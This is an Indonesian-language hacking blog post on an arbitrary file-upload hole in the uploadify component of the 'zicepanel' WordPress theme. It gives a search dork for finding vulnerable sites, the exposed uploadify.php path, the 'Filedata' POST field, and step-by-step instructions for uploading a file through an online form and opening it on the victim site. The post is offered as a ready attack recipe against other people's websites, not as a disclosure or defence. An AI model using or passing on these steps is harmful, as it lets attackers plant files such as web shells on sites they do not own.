vulnerability uploadify in wordpress themes zicepanel

vulnerability uploadify in wordpress themes zicepanel


vulnerability uploadify in wordpress themes zicepanel

 
selalu saja wordpress yang memiliki banyak celah , banyak sekali eksploit untuk wordpress yang celah nya berasal dari themes ,

     seperti themes zicepanel ini memiliki celah pada uploadify juga

dork :
inurl:/wp-content/themes/zicepanel/

eksploit :
site.com/themes/zicepanel/components/uploadify/uploadify.php

jika blank kemungkinan vuln untuk kita upload file menggunakan CSRF
CSRF ONLINE HERE




Isi url    : site.com/themes/zicepanel/components/uploadify/uploadify.php
post       : Filedata

klik kunci target

pilih file yang mau kita upload dan klik upload , tunggu


 


 jika muncul tulisan seperti gambar di atas maka file kita berhasil ke upload

cara aksesnya site.com/( nama yang muncul )



nah file kita terupload kan :3




semoga bermanfaat gan :3
Share This :